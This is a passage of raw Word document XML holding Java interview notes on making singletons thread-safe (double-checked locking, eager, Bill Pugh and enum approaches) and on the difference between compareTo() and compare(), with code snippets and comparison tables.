      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc197867275"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can you make a singleton class as thread safe</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="10D55674" w14:textId="378E24A8" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6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zy Initialization with synchronized block (Double-Checked Locking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF5EC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2DD8999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69882F48" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288AD4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0D731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2C054AC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1316F3" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116453E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0F28BE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f (instance == null) { // First check (no synchronization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEA48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 // Locking only once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752A36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Second check (within synchronized block)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6FBD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CCB239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21C1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16D28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96D14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4E70A3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7F20F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2086C9" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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0DFABCE"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the instance is properly visible to all threads and prevents the instance from being cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCECF0F"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uble-checked locking pattern ensures that synchronization is only done the first time the instance is created, reducing overhead in subsequent calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEA486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ager Initialization (Thread-Safe by Default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E80B4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ADDFE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316F71B5" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B69F6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B30220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1097152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1451FE" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199A2D4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AC8CD5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47B8CA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FC60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A879" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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D08110F"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and Java guarantees that class loading is thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298343E4"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needed here, making this method efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD05AB2"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wnside is that the instance is created regardless of whether it is used or not, which could be inefficient if the instance is never used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7334227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Using Static Inner Class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321B648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70602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C9B008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617029E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05AF6F" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2028079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3AB83CF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instance is created when the class is accessed for the first time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4908AFE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6D50B2F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D9DB8" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C8717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25B6937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6844FC8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99746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1382B0" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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3A8969A9"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ner static class (SingletonHelper) contains the Singleton instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A75C6D"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instance is created only when getInstance() is called for the first time, ensuring lazy initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639187E1"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ClassLoader mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle the synchronization automatically, ensuring thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6116AB1D"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Best Practice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF525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simplest and most efficient approach. This approach guarantees thread-safety and serialization while avoiding the complexities of synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F6FF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enum Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2B1D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2CE51D" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385E4D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oSomething() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DE30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implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFDBCA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3A424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0D9D2C" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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1E5372B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ensures that enums are instantiated only once, which guarantees thread-safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0265504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also immune to serialization issues, making it the best and most recommended approach for Singleton in modern Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6175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170"/>
        <w:gridCol w:w="1241"/>
        <w:gridCol w:w="1093"/>
        <w:gridCol w:w="4028"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC6DCB" w:rsidRPr="00CE4B95" w14:paraId="0A28A63F" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="617AA3D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roach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38EBB51A"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458F80BC"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4A816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1E53A68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FC6DCB" w:rsidRPr="00CE4B95" w14:paraId="2B651B40" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="547E75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Initialization with synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126EE60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37B60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6F2A47E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4166D1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performance overhead with synchronization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC6DCB" w:rsidRPr="00CE4B95" w14:paraId="7B310945" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60D329A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Initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FF30AB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EE2CA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5132C76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4195726"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is created regardless of use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC6DCB" w:rsidRPr="00CE4B95" w14:paraId="483A508D" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="233D8C5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ll Pugh Singleton Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B3C907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D7DD51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F64498A"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556614D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azy initialization with thread-safety.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC6DCB" w:rsidRPr="00CE4B95" w14:paraId="350D6CC4" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0030FFE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with Enum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72D5E9C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3756AB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A8C531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145C53F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practice, simple, and thread-safe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F126CB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E1E705" w14:textId="77777777" w:rsidR="00EE15F1"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Approach:</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using a static inner class)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generally the most efficient and thread-safe ways to implement a Singleton in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8239C4" w14:textId="0B6871E9" w:rsidR="00342FA5"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Choos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if you need lazy initialization and don't want to create the instance until it's needed. Use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for simplicity and when you need the most robust and concise solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C7147E" w14:textId="1871D31F"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89" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7860E911" w14:textId="13DA5330" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="006F7DE0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc197867276"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="007A5AD8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between compar</w:t>
      </w:r>
      <w:r w:rsidR="00F422B4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="007A5AD8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>To and compare method</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="55E8B987" w14:textId="66920439" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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both the compareTo() and compare() methods are used for comparing objects, but they are used in different contexts and serve slightly different purposes. Here's a breakdown of the differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C22521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mpareTo() Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB5668D"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ble interface. It is used to compare the current object (the object that compareTo() is called on) with another object of the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692BE94A"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to implement natural ordering for a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1B3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o(T o)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6918CB"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0CE912F1"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objects are equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6488704E"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the current object is "less than" the specified object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149487C"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the current object is "greater than" the specified object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536EA9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76274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implements Comparable&lt;Student&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77155D3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9A597E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0C1C7F2" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152063E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6A4AE3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46BB66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E58B23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B8CC47" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B81AEC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91A490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To(Student other) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50716C3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age - other.age; // Compare by age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5224F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60280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EBDB98" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="165454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1 = new Student("Alice", 20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F421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2 = new Student("Bob", 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D716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1.compareTo(s2)); // Will return a negative value (20 - 25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137A30BD"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mpare() Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AC7037"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tor interface. It is used for comparing two objects of any class (not necessarily the current class), and it allows for custom ordering of objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F59D89A"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when you need a different or custom sorting logic than the natural ordering defined by compareTo().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D777FF"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 o1, T o2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29232244"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43E6601F"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two objects are equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780261CC"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o1 is less than o2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6EB577"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o1 is greater than o2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48344E80"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19B46E2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9F285FE" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280B211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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E02261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37BD79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10A54D0" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04644F5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7444A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1E3F3F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113A3A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79336D" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B6B19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70C6E0C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8A997F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38CE8E" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4758EAE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938D7DE"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4BE36B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45E6D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B6AB11" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ECD6B8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geComparator implements Comparator&lt;Student&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A3681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DD4E3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310D6FB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1.getAge() - s2.getAge(); // Compare by age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B84798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362D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7D1145" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="020C68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31166C7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udent&gt; students = Arrays.asList(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444BB66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Alice", 20),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A1352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Bob", 25),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8017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Charlie", 18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4305A0D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F8383D" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529257B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students, new AgeComparator());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533C2CB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fter sorting, students will be ordered by age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468B965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141E43"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4286"/>
        <w:gridCol w:w="4300"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="6370986B" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42D9DE2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D9601"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To()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EE0718A"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="3FB7AFD4" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7194202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AA3605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ble interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48B415D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interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="10331AA2" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04E12B1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4D3FBBD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ordering of objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="211726A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ordering of objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="5BC90E4A" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1391684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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C5A6B2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o(T o)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43CE48B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 o1, T o2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="1DFD8287" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
